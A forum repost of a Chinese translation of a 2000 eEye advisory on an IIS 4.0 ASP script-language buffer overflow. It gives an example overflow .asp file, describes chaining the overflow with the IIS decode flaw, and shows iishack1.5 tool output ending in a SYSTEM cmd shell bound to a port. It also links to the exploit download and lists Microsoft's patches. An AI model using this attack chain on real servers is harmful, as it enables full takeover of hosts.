iis漏洞检查
--------------------------------------------------------------------------------
【眉笔】 于 2001-1-14 12:27:53 加贴在 nt世界 ↑
翻译:coolfrog <coolfrog@elong.com>
不当之处请大家指正、修改、完善。
发布日期:2000/11/3
受影响的系统:
windows nt 4.0 iis 4.0 sp6 (易受攻击)
windows nt 5.0 iis 5.0 (不易受攻击)
描述:
在iis (internet information server) asp isapi文件解析机制中存在缓冲区溢出,可以被用来获得system级的访问。
这并非远程而是本地漏洞(然而,我们稍候将解释:你如何远程实现它)。你需要创建一个.asp文件作为牺牲品,当iis解析它的时候导致inetinfo.exe缓冲区溢出,从而允许你以system权限控制本地服务器。
那么,谁将受此影响呢?任何运行多个客户nt4 iis4 web服务器的网络公司或internet服务供应商。主要说来,任何可以更新网站的客户(或攻击者)上传一个新的default.asp或anything.asp,可以接着以system执行代码进而完全控制你的服务器。他们可以对那台服务器的其他任何客户站点做任何事情,同时,他们可以安装sniffer或破解口令以扩大他们在你的网络中的战果。
因此出现了题为$19.95的攻击…任何拥有$20的人可以入侵一个运行nt4+iis4的网络主机公司或internet服务供应商。只要在网络主机公司购买一个账号,上传你的evil.asp并用ie从你的网站请求这个evil.asp,http://www.badguy.com/evil.asp,并且杂那台服务器上以system执行你的代码。
这里是一个.asp文件导致nt4+iis4的inetinfo.exe溢出的例子
----start-cut-of-example.asp----
<script language="[buffer]" runat="server">
</script>
----start-cut-of-example.asp----
注意 [buffer] 是2220 字母或更多。对,这个溢出可以利用,看下面的部分。
然而你没有$20支付,或者服务器不提供站点空间,那怎么办?那么好吧,如果可以远程攻击的话就好了嘛。
例如:服务器有个写入时不过滤script命令的.asp来客登记/留言板系统系统。因此入侵者可以进入拥有“在此输入你的信息:”框的页面(或者更多),他们只需要粘贴这些溢出代码并提交信息(内含溢出信息),这将致使iis解析这个.asp文件,溢出,并执行他们的代码。
另外,你可以将这个攻击技术与最近的iis解码漏洞结合起来,使用cmd.exe echo你的evil.asp内容到远程系统,然后当你请求evil.asp时,你的代码将被以system权限执行。事实上,我们已经构造了一个漏洞实例来表明这个.asp语言溢出,并且iis解码漏洞可以一起使用,危及任何没有及时安装补丁的nt4+iis4+sp6(或更低版本)系统。
由于这个攻击悄无声息,很自然,所以很有可能防火墙不能抵御类似的攻击。
漏洞:
如何远程攻击系统呢?使用iis解码漏洞+.asp语言溢出漏洞
如果你不熟悉iis解码漏洞,最起码它允许你透过iis以iusr_machine的权限远程执行命令。ok,因为我们可以通过cmd.exe执行命令,我们可以试着让远程主机连接到外部的ftp服务器获取文件(似乎优先考虑iishack),但你将只能以iusr_machine的权限执行命令。我们的这个漏洞通过使用iis解码漏洞工作,echo我们的.asp文件(以shell代码结束,绑定cmd.exe到一个端口;-))到一个远程服务器,并请求访问这个文件,然后导致inetinfo.exe溢出,将一个system特权cmd.exe绑定到一个特殊端口。好了,在很多情况下你应该拥有恰当的cmd.exe的访问控制(这将不允许iusr_machine访问)就像其他的安全措施一样,因此我们应该知道这个漏洞在一个安全的系统里不会工作的。然而,这仅仅是从概念上讲的,并且正如我们大多数人了解的那样,大多数iis服务器并没有恰当的本地安全措施。这个漏洞工作起来基本上是下面这个样子的:
c:\we are still hiring good programmers> iishack1.5.exe
iishack version 1.5
eeye digital security
http://www.eeye.com
code by: ryan permeh & marc maiffret
eeye digital security takes no responsibility for use of this code.
it is for educational purposes only.
usage: iishack1.5 [server] [server-port] [trojan-port]
c:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80
6969
iishack version 1.5
eeye digital security
http://www.eeye.com
code by: ryan permeh & marc maiffret
eeye digital security takes no responsibility for use of this code.
it is for educational purposes only.
attempting to find an executable directory...
trying directory [scripts]
executable directory found. [scripts]
path to executable directory is [c:\inetpub\scripts]
moving cmd.exe from winnt\system32 to c:\inetpub\scripts.
successfully moved cmd.exe to c:\inetpub\scripts\eeyehack.exe
sending the exploit...
exploit sent! now telnet to www.[yourowncompany].com on port 6969 and you
should get a cmd prompt.
c:\> telnet www.[yourowncompany].com 6969
trying www.[yourowncompany].com...
microsoft(r) windows nt(tm)
(c) copyright 1985-1996 microsoft corp.
c:\winnt\system32>whoami
nt authority\system
在这里下载整个exploit:
http://www.eeye.com/html/advisories/iishack1.5.zip
m$的回应:
m$已经在当前最新的补丁里补上这个.asp语言溢出漏洞,并使它在大多数最新的service pack 6里发布。这个漏洞已经被最新版本的w3svc.dll补上,安装所有最新的补丁吧,你就没这个问题啦。
这里有一些m$的报告和补丁的列表(针对.asp语言溢出漏洞)
ms00-080: patch available for "session id cookie marking" vulnerability
ms00-060: patch available for "iis cross-site scripting" vulnerabilities
ms00-057: patch available for "file permission canonicalization"
vulnerability
